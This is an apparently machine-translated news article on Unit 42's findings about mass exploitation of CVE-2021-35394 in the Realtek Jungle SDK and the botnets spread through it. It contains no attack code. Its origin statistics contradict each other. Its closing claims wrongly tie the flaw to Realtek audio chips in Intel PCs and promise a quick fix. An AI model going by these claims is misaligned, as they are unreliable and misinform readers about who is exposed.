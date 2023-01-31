Cyber ​​security specialists they warn regarding a spike in attempts to exploit a bug weaponizing a critical remote code execution flaw in the Realtek Jungle SDK since early August 2022.

According to Palo Alto Networks Unit 42, the ongoing campaign reportedly logged 134 million exploit attempts as of December 2022, with 97 percent of attacks occurring in the past four months.

In summary: almost 50% of the attacks originated from the United States (48.3%), followed by Vietnam (17.8%), Russia (14.6%), the Netherlands (7.4%), France ( 6.4%), Germany (2.3%) and Luxembourg (1.6%).

Furthermore, 95% of the attacks that exploit the security gap originate from Russia, it must be said that experts have also identified cybercriminal organizations in Australia.

“Many of the attacks we observed attempted to deliver malware to infect vulnerable IoT devices“, they have stated researchers from Unit 42 in a report on the Realtek case, adding that “the groups [autori] of threats are using this vulnerability to carry out large-scale attacks on smart devices around the world“.

The vulnerability in question is CVE-2021-35394 (CVSS score: 9.8), a set of buffer overflows and a malicious command injection bug, which could be used as to execute malicious code with the highest level of privileges (administrator privileges, precisely) and take control of the affected applications.

The problems have been disclosed by ONEKEY (formerly IoT Inspector) in August 2021; The vulnerability affects a variety of devices from D-Link, LG, Belkin, ASUS, and NETGEAR.

Unit 42 said it discovered three different types of payloads distributed as a result of the exploitation in-the-wild of the Realtek security flaw:

A script executes a shell command on the target server to download additional malware;

A remotely inserted command (injection) that writes a binary payload to a file and executes it;

An injected command that directly restarts the target server to cause a denial-of-service (DoS) condition.

In addition, known botnets such as Mirai, Gafgyt, and Mozi have been distributed through the abuse of CVE-2021-35394, as well as a new Golang-based DDoS (Distributed Denial-of-Service) botnet, named RedGoBot.

First observed in September 2022, the RedGoBot hacking campaign involves the elimination of a shell script designed to download a series of botnet clients, which to hole different CPU architectures, subsequently the malware, once launched, is able to execute operating system commands and mount DDoS attacks.

The results once again highlight the importance of updating software in a timely manner to avoid exposure to potential threats.

“The wave of attacks leveraging CVE-2021-35394 shows that threat actors are very interested in supply chain vulnerabilities, which can be difficult for the average user to identify and fix“concluded the researchers. “These issues can make it difficult for the interested user to identify the specific downstream products that are being exploited“.

Realtek, to one degree or another, we almost all have it

Without having to sound alarmist, Realtek products are hiding in the most unlikely places: desktop computers, laptops, probably even a few tablets.

Usually, in fact, Realtek puts audio chips or cards on motherboards (usually Intel); unfortunately, basically no one is safe if they have an intel PC with integrated Realtek sound card.

However, don’t be alarmed: the programmers are sure to be fixing the problem and it will be fixed as soon as possible.